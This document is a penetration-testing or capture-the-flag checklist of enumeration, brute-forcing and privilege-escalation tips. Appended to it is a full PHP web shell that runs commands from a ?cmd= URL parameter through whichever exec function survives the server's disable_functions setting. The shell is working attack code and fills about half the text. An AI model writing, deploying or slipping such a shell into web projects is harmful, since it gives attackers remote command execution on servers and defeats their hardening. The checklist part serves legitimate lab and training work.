Hack$Notes
General Checklist

  • Check default passwords.
  • Check versions of services.
  • Try more than one wordlist while directory brute-forcing (e.g. /usr/share/wordlists/dirb/big.txt, /usr/share/wordlists/dirbuster/apache-user-enum-2.0.txt, /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt); different lists find different paths.
  • Once inside a CMS or site check every single page.
  • bash vs sh. Try both when doing privesc; a script or cron job that works under one may fail under the other (on many distributions /bin/sh is dash, not bash).
  • SEARCH EVERYTHING, even if it seems silly (e.g. photos). Check even CSS files.
  • Check other exploits too if they are available; do not get stuck on one. The target may report version 2.4 and an exploit written for version 2.5 may still work.
  • Enumerate subdomains if you are getting nothing.
  • Check the /opt and /var directories.
  • Intercept traffic with BurpSuite if you are stuck.
  • If you have found one way in and believe there is no other, stick with it and keep searching around it.
  • Run more than one privesc script (LinEnum, lse.sh, linPEAS, etc.); each one checks different things.
  • If you see http://10.10.10.10/index.php/, run gobuster/dirsearch against that path too. It may reveal a URL such as http://10.10.10.10/index.php/admin/.
  • Read the code. The details of what needs to be done or changed are in there. Just read the code!
  • Try all of them: shell_exec, system, exec. disable_functions may block some of them but not others, so check each one before giving up.
  • If credentials are not working and you are sure they should, revert the box. It might have crashed somewhere along the way.
  • If you are 100% sure the exploit is the right one and it is not working, try the 64-bit or 32-bit build, depending on the architecture of the box.
  • If a page redirects you, install the NoRedirect add-on for Firefox and add the page so it is not redirected. Also intercept the traffic with BurpSuite to see where the redirect goes.
  • Execute commands manually. Sometimes you miss it when running automate scripts.
  • Search for and spend some time on LFI/URL parameters.
  • Running out of ideas? Brute-force may be the last option (use different lists, not only rockyou.txt).
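The "try shell_exec, system, exec" item above in working form, as an added example that is not part of the original notes: a small PHP probe that lists which command-execution functions the target actually allows and runs the command through the first one that works. It goes beyond the three functions named in the list by also trying passthru, popen and proc_open, which are subject to the same disable_functions setting. The cmd query parameter and the default command `id` are assumptions for illustration.

```php
<?php
// Added example (not from the original page): find a usable PHP exec primitive.
// disable_functions lists whatever the target's php.ini sets; on PHP < 8.0 a
// disabled function still passes function_exists(), so both checks are needed.

function disabled_functions(): array {
    $raw = (string) ini_get('disable_functions');
    return array_values(array_filter(array_map('trim', explode(',', $raw))));
}

function usable_exec_functions(): array {
    $candidates = ['shell_exec', 'system', 'exec', 'passthru', 'popen', 'proc_open'];
    $disabled = disabled_functions();
    $usable = [];
    foreach ($candidates as $fn) {
        if (function_exists($fn) && !in_array($fn, $disabled, true)) {
            $usable[] = $fn;
        }
    }
    return $usable;
}

// Run $cmd through each usable primitive in turn; return its combined output,
// or null when every primitive is missing or disabled.
function run_command(string $cmd): ?string {
    foreach (usable_exec_functions() as $fn) {
        switch ($fn) {
            case 'shell_exec':
                $out = shell_exec($cmd . ' 2>&1');
                if (is_string($out)) return $out;   // null/false: try the next one
                break;
            case 'system':
                ob_start();
                system($cmd . ' 2>&1');
                return ob_get_clean();
            case 'exec':
                exec($cmd . ' 2>&1', $lines);
                return implode("\n", $lines) . "\n";
            case 'passthru':
                ob_start();
                passthru($cmd . ' 2>&1');
                return ob_get_clean();
            case 'popen':
                $h = popen($cmd . ' 2>&1', 'r');
                if ($h === false) break;
                $out = stream_get_contents($h);
                pclose($h);
                return $out;
            case 'proc_open':
                $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
                $p = proc_open($cmd, $spec, $pipes);
                if (!is_resource($p)) break;
                $out = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
                fclose($pipes[1]);
                fclose($pipes[2]);
                proc_close($p);
                return $out;
        }
    }
    return null;
}

// Assumed interface for the example: ?cmd=<command>, defaulting to `id`.
$cmd = $_GET['cmd'] ?? 'id';
header('Content-Type: text/plain');
echo 'usable: ' . implode(', ', usable_exec_functions()) . "\n";
$result = run_command($cmd);
echo $result === null ? "no usable exec primitive\n" : $result;
```

If the probe reports no usable primitive, the remaining options are outside these functions (mail/LD_PRELOAD tricks, other extensions), so the output tells you quickly whether to keep pushing on command execution or move on.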
As a general rule: one finding leads to the next (e.g. found a file? It will lead you to the next step).